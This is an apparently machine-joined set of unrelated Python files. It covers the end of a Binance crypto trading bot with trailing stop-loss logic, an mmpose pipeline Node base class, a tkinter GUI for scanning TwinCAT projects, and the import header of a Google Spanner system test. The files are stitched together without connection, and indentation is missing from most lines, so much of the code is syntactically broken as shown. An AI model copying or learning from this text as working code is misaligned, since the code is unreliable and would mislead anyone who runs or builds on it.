SL = float(coins_bought[coin]['bought_at']) + (float(coins_bought[coin]['bought_at']) * coins_bought[coin]['stop_loss']) / 100
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
        # check that the price is above the take profit and readjust SL and TP accordingly if a trailing stop loss is used
if LastPrice > TP and USE_TRAILING_STOP_LOSS:
# increasing TP by TRAILING_TAKE_PROFIT (essentially next time to readjust SL)
coins_bought[coin]['take_profit'] = PriceChange + TRAILING_TAKE_PROFIT
coins_bought[coin]['stop_loss'] = coins_bought[coin]['take_profit'] - TRAILING_STOP_LOSS
if DEBUG: print(f"{coin} TP reached, adjusting TP {coins_bought[coin]['take_profit']:.2f} and SL {coins_bought[coin]['stop_loss']:.2f} accordingly to lock-in profit")
continue
# check that the price is below the stop loss or above take profit (if trailing stop loss not used) and sell if this is the case
        if LastPrice < SL or (LastPrice > TP and not USE_TRAILING_STOP_LOSS):
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}TP or SL reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
# Log trade
if LOG_TRADES:
profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
write_log(f"Sell: {coins_sold[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} Profit: {profit:.2f} {PriceChange-(TRADING_FEE*2):.2f}%")
session_profit=session_profit + (PriceChange-(TRADING_FEE*2))
continue
# no action; print once every TIME_DIFFERENCE
if hsp_head == 1:
if len(coins_bought) > 0:
print(f'TP or SL not yet reached, not selling {coin} for now {BuyPrice} - {LastPrice} : {txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}{PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}')
if hsp_head == 1 and len(coins_bought) == 0: print(f'Not holding any coins')
return coins_sold
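
# An isolated sketch of the trailing-stop adjustment performed in sell_coins():
# once the price clears the current take-profit level, both TP and SL are
# re-anchored to the realised percentage change so that gains are locked in.
# The trailing percentages are plain parameters here purely for illustration.
def _sketch_trailing_adjust(bought_at, last_price, take_profit, stop_loss,
                            trailing_take_profit, trailing_stop_loss):
    tp_price = bought_at + bought_at * take_profit / 100
    price_change = (last_price - bought_at) / bought_at * 100
    if last_price > tp_price:
        take_profit = price_change + trailing_take_profit
        stop_loss = take_profit - trailing_stop_loss
    return take_profit, stop_loss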
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
if DEBUG: print(orders)
for coin in orders:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
}
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
print(f'Order with id {orders[coin][0]["orderId"]} placed and saved to file')
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def write_log(logline):
timestamp = datetime.now().strftime("%d/%m %H:%M:%S")
with open(LOG_FILE,'a+') as f:
f.write(timestamp + ' ' + logline + '\n')
if __name__ == '__main__':
# Load arguments then parse settings
args = parse_args()
mymodule = {}
# set to false at Start
global bot_paused
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
QUANTITY = parsed_config['trading_options']['QUANTITY']
MAX_COINS = parsed_config['trading_options']['MAX_COINS']
FIATS = parsed_config['trading_options']['FIATS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
if DEBUG_SETTING or args.debug:
DEBUG = True
# Load creds for correct environment
access_key, secret_key = load_correct_creds(parsed_creds)
if DEBUG:
print(f'loaded config below\n{json.dumps(parsed_config, indent=4)}')
print(f'Your credentials have been loaded from {creds_file}')
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
client = Client(access_key, secret_key, tld='us')
else:
client = Client(access_key, secret_key)
    # If the user has a bad / incorrect API key,
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
# Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
# path to the saved coins_bought file
coins_bought_file_path = 'coins_bought.json'
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# use separate files for testing and live trading
if TEST_MODE:
coins_bought_file_path = 'test_' + coins_bought_file_path
# if saved coins_bought json file exists and it's not empty then load it
    if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size != 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-Q to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
print('WARNING: You are using the Mainnet and live funds. Waiting 30 seconds as a security measure')
time.sleep(30)
    # remove stale external signal files left over from a previous run
    signals = glob.glob("signals/*.exs")
    for filename in signals:
        try:
            os.remove(filename)
        except:
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
if os.path.isfile("signals/paused.exc"):
try:
os.remove("signals/paused.exc")
except:
            if DEBUG: print(f'{txcolors.WARNING}Could not remove the signals/paused.exc file{txcolors.DEFAULT}')
# load signalling modules
try:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
t = threading.Thread(target=mymodule[module].do_work, args=())
t.daemon = True
t.start()
time.sleep(2)
else:
print(f'No modules to load {SIGNALLING_MODULES}')
except Exception as e:
print(e)
# seed initial prices
get_price()
while True:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
|
node.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import logging
import time
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from queue import Empty
from threading import Thread
from typing import Callable, Dict, List, Optional, Tuple, Union
from mmcv.utils.misc import is_method_overridden
from mmpose.utils import StopWatch
from ..utils import Message, VideoEndingMessage, limit_max_fps
@dataclass
class BufferInfo():
"""Dataclass for buffer information."""
buffer_name: str
input_name: Optional[str] = None
trigger: bool = False
@dataclass
class EventInfo():
"""Dataclass for event handler information."""
event_name: str
is_keyboard: bool = False
handler_func: Optional[Callable] = None
class Node(Thread, metaclass=ABCMeta):
"""Base interface of functional module.
Parameters:
name (str, optional): The node name (also thread name).
enable_key (str|int, optional): Set a hot-key to toggle enable/disable
of the node. If an int value is given, it will be treated as an
ascii code of a key. Please note:
                1. If enable_key is set, the bypass method needs to be
                    overridden to define the node behavior when disabled
                2. Some hot-keys are reserved for particular uses. For example:
                    'q', 'Q' and 27 are used for quitting
Default: None
max_fps (int): Maximum FPS of the node. This is to avoid the node
            running unrestrictedly and causing excessive resource consumption.
Default: 30
        input_check_interval (float): Minimum interval (in seconds) between
            checks of whether the input is ready. Default: 0.01
enable (bool): Default enable/disable status. Default: True.
        daemon (bool): Whether the node is a daemon thread. Default: False.
"""
def __init__(self,
name: Optional[str] = None,
enable_key: Optional[Union[str, int]] = None,
max_fps: int = 30,
input_check_interval: float = 0.01,
enable: bool = True,
daemon=False):
super().__init__(name=name, daemon=daemon)
self._runner = None
self._enabled = enable
self.enable_key = enable_key
self.max_fps = max_fps
self.input_check_interval = input_check_interval
        # A partitioned view of the runner's buffer manager that only
        # accesses the buffers related to the node
self._buffer_manager = None
# Input/output buffers are a list of registered buffers' information
self._input_buffers = []
self._output_buffers = []
# Event manager is a copy of assigned runner's event manager
self._event_manager = None
# A list of registered event information
# See register_event() for more information
        # Note that we recommend handling events in nodes by registering
# handlers, but one can still access the raw event by _event_manager
self._registered_events = []
# A list of (listener_threads, event_info)
# See set_runner() for more information
self._event_listener_threads = []
# A timer to calculate node FPS
self._timer = StopWatch(window=10)
# Register enable toggle key
if self.enable_key:
# If the node allows toggling enable, it should override the
# `bypass` method to define the node behavior when disabled.
if not is_method_overridden('bypass', Node, self.__class__):
raise NotImplementedError(
                    f'The node {self.__class__} does not support toggling '
                    'enable but got argument `enable_key`. To support toggling '
                    'enable, please override the `bypass` method of the node.')
self.register_event(
event_name=self.enable_key,
is_keyboard=True,
handler_func=self._toggle_enable,
)
@property
def registered_buffers(self):
return self._input_buffers + self._output_buffers
@property
def registered_events(self):
return self._registered_events.copy()
def _toggle_enable(self):
self._enabled = not self._enabled
def register_input_buffer(self,
buffer_name: str,
input_name: str,
trigger: bool = False):
"""Register an input buffer, so that Node can automatically check if
data is ready, fetch data from the buffers and format the inputs to
feed into `process` method.
This method can be invoked multiple times to register multiple input
buffers.
The subclass of Node should invoke `register_input_buffer` in its
`__init__` method.
Args:
buffer_name (str): The name of the buffer
input_name (str): The name of the fetched message from the
corresponding buffer
            trigger (bool): A trigger input means the node will wait
                until the input is ready before processing. Otherwise, an
                inessential input will not block the processing; instead
                a None will be fetched if the buffer is not ready.
"""
buffer_info = BufferInfo(buffer_name, input_name, trigger)
self._input_buffers.append(buffer_info)
def register_output_buffer(self, buffer_name: Union[str, List[str]]):
"""Register one or multiple output buffers, so that the Node can
automatically send the output of the `process` method to these buffers.
The subclass of Node should invoke `register_output_buffer` in its
`__init__` method.
Args:
buffer_name (str|list): The name(s) of the output buffer(s).
"""
if not isinstance(buffer_name, list):
buffer_name = [buffer_name]
for name in buffer_name:
buffer_info = BufferInfo(name)
self._output_buffers.append(buffer_info)
def register_event(self,
event_name: str,
is_keyboard: bool = False,
handler_func: Optional[Callable] = None):
"""Register an event. All events used in the node need to be registered
        in __init__(). If a callable handler is given, a thread will be created
        to listen and handle the event when the node starts.
        Args:
event_name (str|int): The event name. If is_keyboard==True,
event_name should be a str (as char) or an int (as ascii)
            is_keyboard (bool): Indicate whether it is a keyboard
event. If True, the argument event_name will be regarded as a
key indicator.
handler_func (callable, optional): The event handler function,
                which should be a callable object with no arguments or
return values. Default: None.
"""
event_info = EventInfo(event_name, is_keyboard, handler_func)
self._registered_events.append(event_info)
def set_runner(self, runner):
# Get partitioned buffer manager
buffer_names = [
buffer.buffer_name
for buffer in self._input_buffers + self._output_buffers
]
self._buffer_manager = runner.buffer_manager.get_sub_manager(
buffer_names)
# Get event manager
self._event_manager = runner.event_manager
def _get_input_from_buffer(self) -> Tuple[bool, Optional[Dict]]:
"""Get and pack input data if it's ready. The function returns a tuple
of a status flag and a packed data dictionary. If input_buffer is
ready, the status flag will be True, and the packed data is a dict
whose items are buffer names and corresponding messages (unready
additional buffers will give a `None`). Otherwise, the status flag is
False and the packed data is None.
Returns:
bool: status flag
dict[str, Message]: the packed inputs where the key is the buffer
name and the value is the Message got from the corresponding
buffer.
"""
buffer_manager = self._buffer_manager
if buffer_manager is None:
raise ValueError(f'{self.name}: Runner not set!')
# Check that trigger buffers are ready
for buffer_info in self._input_buffers:
if buffer_info.trigger and buffer_manager.is_empty(
buffer_info.buffer_name):
return False, None
# Default input
result = {
buffer_info.input_name: None
for buffer_info in self._input_buffers
}
for buffer_info in self._input_buffers:
try:
result[buffer_info.input_name] = buffer_manager.get(
buffer_info.buffer_name, block=False)
except Empty:
if buffer_info.trigger:
# Return unsuccessful flag if any
# trigger input is unready
return False, None
return True, result
def _send_output_to_buffers(self, output_msg):
"""Send output of the process method to registered output buffers.
Args:
output_msg (Message): output message
"""
for buffer_info in self._output_buffers:
buffer_name = buffer_info.buffer_name
self._buffer_manager.put_force(buffer_name, output_msg)
@abstractmethod
def process(self, input_msgs: Dict[str, Message]) -> Union[Message, None]:
"""The core method that implement the function of the node. This method
will be invoked when the node is enabled and the input data is ready.
All subclasses of Node should override this method.
Args:
input_msgs (dict): The input data collected from the buffers. For
each item, the key is the `input_name` of the registered input
buffer, while the value is a Message instance fetched from the
buffer (or None if the buffer is unessential and not ready).
Returns:
            Message: The output message of the node. It will be sent to all
registered output buffers.
"""
def bypass(self, input_msgs: Dict[str, Message]) -> Union[Message, None]:
"""The method that defines the node behavior when disabled. Note that
        if the node has an `enable_key`, this method should be overridden.
        The input/output of this method is the same as that of the `process` method.
Args:
input_msgs (dict): The input data collected from the buffers. For
each item, the key is the `input_name` of the registered input
buffer, while the value is a Message instance fetched from the
buffer (or None if the buffer is unessential and not ready).
Returns:
            Message: The output message of the node. It will be sent to all
registered output buffers.
"""
raise NotImplementedError
def _get_node_info(self):
"""Get route information of the node."""
info = {'fps': self._timer.report('_FPS_'), 'timestamp': time.time()}
return info
def on_exit(self):
"""This method will be invoked on event `_exit_`.
        Subclasses should override this method to specify the exiting
behavior.
"""
def run(self):
"""Method representing the Node's activity.
        This method overrides the standard run() method of Thread. Users should
not override this method in subclasses.
"""
logging.info(f'Node {self.name} starts')
# Create event listener threads
for event_info in self._registered_events:
if event_info.handler_func is None:
continue
def event_listener():
while True:
with self._event_manager.wait_and_handle(
event_info.event_name, event_info.is_keyboard):
event_info.handler_func()
t_listener = Thread(target=event_listener, args=(), daemon=True)
t_listener.start()
self._event_listener_threads.append(t_listener)
# Loop
while True:
# Exit
if self._event_manager.is_set('_exit_'):
self.on_exit()
break
# Check if input is ready
input_status, input_msgs = self._get_input_from_buffer()
# Input is not ready
if not input_status:
time.sleep(self.input_check_interval)
continue
# If a VideoEndingMessage is received, broadcast the signal
# without invoking process() or bypass()
video_ending = False
for _, msg in input_msgs.items():
if isinstance(msg, VideoEndingMessage):
self._send_output_to_buffers(msg)
video_ending = True
break
if video_ending:
self.on_exit()
break
# Check if enabled
if not self._enabled:
# Override bypass method to define node behavior when disabled
output_msg = self.bypass(input_msgs)
else:
with self._timer.timeit():
with limit_max_fps(self.max_fps):
# Process
output_msg = self.process(input_msgs)
if output_msg:
# Update route information
node_info = self._get_node_info()
output_msg.update_route_info(node=self, info=node_info)
# Send output message
if output_msg is not None:
self._send_output_to_buffers(output_msg)
logging.info(f'{self.name}: process ending.')
class MultiInputNode(Node):
"""Base interface of functional module which accept multiple inputs."""
def _get_input_from_buffer(self) -> Tuple[bool, Optional[Dict]]:
"""Get and pack input data if it's ready. The function returns a tuple
of a status flag and a packed data dictionary. If input_buffer is
ready, the status flag will be True, and the packed data is a dict
whose items are buffer names and corresponding messages (unready
additional buffers will give a `None`). Otherwise, the status flag is
        False and the packed data is None.
Returns:
bool: status flag
dict[str, list[Message]]: the packed inputs where the key
is the buffer name and the value is the Message got from the
corresponding buffer.
"""
buffer_manager = self._buffer_manager
if buffer_manager is None:
raise ValueError(f'{self.name}: Runner not set!')
# Check that essential buffers are ready
for buffer_info in self._input_buffers:
if buffer_info.trigger and buffer_manager.is_empty(
buffer_info.buffer_name):
return False, None
# Default input
result = {
buffer_info.input_name: None
for buffer_info in self._input_buffers
}
for buffer_info in self._input_buffers:
while not buffer_manager.is_empty(buffer_info.buffer_name):
if result[buffer_info.input_name] is None:
result[buffer_info.input_name] = []
result[buffer_info.input_name].append(
buffer_manager.get(buffer_info.buffer_name, block=False))
if buffer_info.trigger and result[buffer_info.input_name] is None:
return False, None
return True, result
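
# A framework-free sketch of the input-fetch policy implemented by
# Node._get_input_from_buffer() above: buffers marked as triggers must have
# data before anything is consumed, while optional buffers simply yield None
# when empty. The queue-based helper below is illustrative only and relies on
# `Empty`, which is already imported at the top of this file.
from queue import Queue as _Queue

def _sketch_fetch_inputs(buffers, triggers):
    """buffers: dict name -> queue.Queue; triggers: set of required names."""
    # Refuse to consume anything while a trigger buffer is still empty.
    for name in triggers:
        if buffers[name].empty():
            return False, None
    result = {name: None for name in buffers}
    for name, q in buffers.items():
        try:
            result[name] = q.get(block=False)
        except Empty:
            if name in triggers:
                # A trigger buffer emptied between the check and the get.
                return False, None
    return True, result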
|
twincatscannergui.py
|
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
import threading
import twincatscanner
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.grid(row=0, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(3, weight=1)
self.create_widgets()
def create_widgets(self):
self.buttons = ttk.Frame(self)
self.buttons.grid(row=0, column=0, sticky=tk.NSEW)
self.buttons.columnconfigure(6, weight=1)
self.buttons.rowconfigure(1, weight=1)
        self.dir_select = ttk.Button(self.buttons, text="Select project", command=self.dir_select_command)
self.dir_select.grid(row=0, column=0, sticky=tk.NSEW)
self.dir = tk.StringVar()
self.dir_path = ttk.Entry(self, textvariable=self.dir)
self.dir_path.grid(row=1, column=0, sticky=tk.NSEW)
        self.dir_process = ttk.Button(self.buttons, text="Scan project", command=self.dir_process_command_async)
self.dir_process.grid(row=0, column=1, sticky=tk.NSEW)
        self.export = ttk.Button(self.buttons, text="Save project", command=self.csv_command)
self.export.grid(row=0, column=3, sticky=tk.NSEW)
        self.select_type = ttk.Button(self.buttons, text="Type", command=self.type_command, state='disabled')
        self.select_type.grid(row=0, column=4, sticky=tk.NSEW)
        self.select_mem_map = ttk.Button(self.buttons, text="Memory", command=self.mem_map_command, state='disabled')
        self.select_mem_map.grid(row=0, column=5, sticky=tk.NSEW)
        self.quit = ttk.Button(self, text="Exit", command=ROOT.destroy)
self.quit.grid(row=0, column=1, rowspan=2, sticky=tk.NSEW)
self.main_area = ttk.Notebook(self)
self.main_area.grid(row=3, column=0, columnspan=2, sticky=tk.NSEW)
        self.tab_names = {0 : "Variables", 1 : "Constants", 2 : "Types", 3 : "Memory"}
self.memory_areas_list = self.create_tab(self.main_area, self.tab_names[0], ("name", "offset", "size", "type", "overlap count"))
self.memory_areas_list.column('#0', stretch=tk.NO)
self.memory_areas_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#2', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#3', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.column('#4', stretch=tk.NO, anchor=tk.CENTER)
self.memory_areas_list.bind('<<TreeviewSelect>>', self.memory_areas_select_command)
self.memory_areas_items = []
self.const_list = self.create_tab(self.main_area, self.tab_names[1], ("name", "value"))
self.const_list.column('#0', stretch=tk.NO)
self.const_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.const_items = []
self.types_list = self.create_tab(self.main_area, self.tab_names[2], ("name", "size"))
self.types_list.column('#0', stretch=tk.NO)
self.types_list.column('#1', stretch=tk.NO, anchor=tk.CENTER)
self.types_items = []
self.mem_list = self.create_tab(self.main_area, self.tab_names[3], ("adr", "variables"))
self.mem_list.column('#0', stretch=tk.NO, anchor=tk.CENTER)
self.mem_list.column('#1', stretch=tk.NO)
self.mem_items = []
self.filter_var = tk.StringVar()
self.filter_var.trace_add("write", self.filter_callback)
self.filter_entry = ttk.Entry(self, textvariable=self.filter_var)
self.filter_entry.grid(row=4, column=0, sticky=tk.NSEW)
        self.clear_filter = ttk.Button(self, text="Clear filter", command=self.clear_filter_command)
self.clear_filter.grid(row=4, column=1, sticky=tk.NSEW)
self.status = tk.StringVar()
self.status_label = ttk.Label(self, textvariable=self.status)
self.status_label.grid(row=5, column=0, columnspan=2, sticky=tk.NSEW)
def create_tab(self, master, text, columns):
tab = ttk.Frame(master)
tab.pack(expand=True, fill=tk.BOTH)
tab.rowconfigure(0, weight=1)
tab.columnconfigure(0, weight=1)
master.add(tab, text=text)
tree = ttk.Treeview(tab, columns=columns)
tab_ysb = ttk.Scrollbar(tab, orient=tk.VERTICAL, command=tree.yview)
tab_xsb = ttk.Scrollbar(tab, orient=tk.HORIZONTAL, command=tree.xview)
tree['yscroll'] = tab_ysb.set
tree['xscroll'] = tab_xsb.set
size = range(len(columns))
for i in size:
tree.heading("#{}".format(str(i)), text=columns[i])
tree.grid(row=0, column=0, sticky=tk.NSEW)
tab_ysb.grid(row=0, column=1, sticky=tk.NS)
tab_xsb.grid(row=1, column=0, sticky=tk.EW)
return tree
def dir_select_command(self):
tmp_dir = filedialog.askdirectory()
self.dir.set(tmp_dir)
def memory_areas_select_command(self, _):
state = 'normal' if self.memory_areas_list.selection() else 'disabled'
self.select_type['state'] = state
self.select_mem_map['state'] = state
def dir_process_command(self):
scanner = twincatscanner.TwinCatScanner()
scanner.notify = self.app_notify
path = self.dir_path.get()
memory_areas, constants, types, memory_map = scanner.run(path)
self.load(memory_areas, types, constants, memory_map)
self.memory_areas_select_command(None)
def dir_process_command_async(self):
thr = threading.Thread(target=self.dir_process_command)
thr.daemon = True
thr.start()
def load(self, memory_areas, types, constants, memory_map):
self.app_notify("ładowanie")
self.load_memory_areas(memory_areas)
self.load_constants(constants)
self.load_types(types)
self.load_memory_map(memory_map)
self.app_notify("")
self.refresh_async()
def refresh(self):
self.app_notify("odświeżanie")
text_filter = self.filter_var.get().upper()
self.refresh_list(self.memory_areas_list, self.memory_areas_items, text_filter=text_filter)
self.refresh_list(self.const_list, self.const_items, text_filter=text_filter)
self.refresh_list(self.types_list, self.types_items, text_filter=text_filter)
self.refresh_list(self.mem_list, self.mem_items, text_filter=text_filter)
self.app_notify("")
def refresh_async(self):
thr = threading.Thread(target=self.refresh)
thr.daemon = True
thr.start()
def refresh_list(self, treeview, items, text_filter=""):
treeview.delete(*treeview.get_children())
for item in items:
if not treeview.exists(item[1]) and self.filter_item(item, text_filter):
self.insert_item(item, treeview, items)
def filter_item(self, item, text_filter):
if not text_filter or text_filter in item[1].upper():
return True
for val in item[2]:
if text_filter in str(val).upper():
return True
return False
def insert_item(self, item, treeview, items):
if item[0] and not treeview.exists(item[0]):
for parent in items:
if parent[1] == item[0]:
self.insert_item(parent, treeview, items)
treeview.insert(item[0], 'end', item[1], text=item[1], values=item[2])
def load_memory_areas(self, memory_areas):
self.memory_areas_items.clear()
for area in memory_areas:
count = len(list(filter(lambda x, y=area: self.memory_area_overlap(x, y), memory_areas))) - 1
values = [str(area['offset']), area['size'], area['type_name'], str(count)]
self.memory_areas_items.append(('', area['var_name'], values))
def memory_area_overlap(self, area1, area2):
if area1['size'] and area2['size']:
r1 = range(area1['offset'], area1['offset'] + area1['size'])
r2 = range(area2['offset'], area2['offset'] + area2['size'])
return not ((r1[-1]<r2[0]) or (r2[-1]<r1[0]))
else:
return False
def load_constants(self, constants):
self.const_items.clear()
for const_name in constants:
const_values = [str(constants[const_name])]
self.const_items.append(('', const_name, const_values))
def load_types(self, types):
self.types_items.clear()
for type_name in types:
type_values = [str(types[type_name]['size'])]
self.types_items.append(('', type_name, type_values))
for field in types[type_name]['fields']:
field_text = "{}.{}".format(type_name, field)
field_values = [str(types[type_name]['fields'][field])]
self.types_items.append((type_name, field_text, field_values))
def load_memory_map(self, memory_map):
self.mem_items.clear()
for mem in memory_map:
mem_values = [memory_map[mem]]
self.mem_items.append(('', str(mem), mem_values))
def app_notify(self, notification):
self.status.set(notification)
def csv_command(self):
import os
path = self.dir_path.get()
checked = path if path else "ProgressTwinCatScan"
basedir = os.path.normpath(checked)
basename = os.path.basename(basedir)
selected = self.main_area.index(self.main_area.select())
filename = "{}_{}".format(basename, self.tab_names[selected])
csv = tk.filedialog.asksaveasfile(filetypes=[("csv files", "*.csv")], initialfile=filename, defaultextension=".csv")
if csv is not None:
if selected == 0:
self.csv_write(csv, self.memory_areas_list, self.csv_memory_areas)
elif selected == 1:
self.csv_write(csv, self.const_list, self.csv_other)
elif selected == 2:
self.csv_write(csv, self.types_list, self.csv_other, subitems=True)
elif selected == 3:
self.csv_write(csv, self.mem_list, self.csv_other)
            messagebox.showinfo("ProgressTwinCatScanner", "File saved")
csv.close()
def csv_write(self, csv, treeview, csv_format, subitems=False, item=None):
childen = treeview.get_children(item)
for child in childen:
item = treeview.item(child)
csv.write(csv_format(item))
if subitems:
self.csv_write(csv, treeview, csv_format, subitems=True, item=child)
def csv_memory_areas(self, item):
return "{};{};{};\n".format(item['text'], item['values'][0], item['values'][2])
def csv_other(self, item):
return "{};{};\n".format(item['text'], item['values'][0])
def type_command(self):
self.jump(self.types_list, 2, 2)
def mem_map_command(self):
self.jump(self.mem_list, 3, 0)
def jump(self, treeview, treeview_index, value_index):
selection = self.memory_areas_list.selection()
if selection is not None:
selected_item = self.memory_areas_list.item(selection)
selected_value = selected_item['values'][value_index]
if treeview.exists(selected_value):
self.main_area.select(treeview_index)
treeview.selection_set(selected_value)
value_index = treeview.index(treeview.selection())
value_count = len(treeview.get_children())
if value_count > 0:
treeview.yview_moveto(value_index/value_count)
def clear_filter_command(self):
self.filter_var.set("")
def filter_callback(self, a, b, c):
self.refresh()
ROOT = tk.Tk()
ROOT.title("ProgressTwinCatScanner")
ROOT.rowconfigure(0, weight=1)
ROOT.columnconfigure(0, weight=1)
ROOT.style = ttk.Style()
ROOT.style.theme_use("alt")
ROOT.style.configure('.', font=('courier', 10))
ROOT.style.configure('TFrame', foreground="white", background="navy")
ROOT.style.configure('TEntry', foreground="white", fieldbackground="brown4", font=('fixedsys', 10))
ROOT.style.configure('TButton', foreground="white", background="aquamarine4")
ROOT.style.configure('TMenubutton', foreground="white", background="aquamarine4")
ROOT.style.configure('TNotebook', foreground="white", background="navy")
ROOT.style.configure('Treeview', foreground="white", background="navy", fieldbackground="navy")
ROOT.style.configure('TLabel', foreground="white", background="black")
ROOT.style.configure("Vertical.TScrollbar", troughcolor="medium orchid")
ROOT.style.configure("Horizontal.TScrollbar", troughcolor="medium orchid")
APP = Application(master=ROOT)
APP.mainloop()
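
# An isolated restatement of the interval test used in
# Application.memory_area_overlap(): two memory areas overlap when neither
# one ends before the other begins. Offsets and sizes are in bytes; the
# helper name is illustrative only and is not used by the GUI above.
def _sketch_areas_overlap(offset1, size1, offset2, size2):
    if not (size1 and size2):
        return False
    return not (offset1 + size1 - 1 < offset2 or offset2 + size2 - 1 < offset1)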
|
test_system.py
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import super
from builtins import range
from builtins import zip
from builtins import map
from builtins import str
from builtins import dict
from builtins import int
from future import standard_library
standard_library.install_aliases()
# Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import datetime
import decimal
import math
import operator
import os
import struct
import threading
import time
import unittest
import uuid
import grpc
from google.rpc import code_pb2
from google.api_core import exceptions
from google.api_core.datetime_helpers import DatetimeWithNanoseconds
from google.cloud.spanner_v1 import param_types
from google.cloud.spanner_v1 import TypeCode
from google.cloud.spanner_v1 import Type
from google.cloud._helpers import UTC
from google.cloud.spanner_v1 import BurstyPool
from google.cloud.spanner_v1 import COMMIT_TIMESTAMP
from google.cloud.spanner_v1 import Client
from google.cloud.spanner_v1 import KeyRange
from google.cloud.spanner_v1 import KeySet
from google.cloud.spanner_v1.instance import Backup
from google.cloud.spanner_v1.instance import Instance
from test_utils.retry import RetryErrors
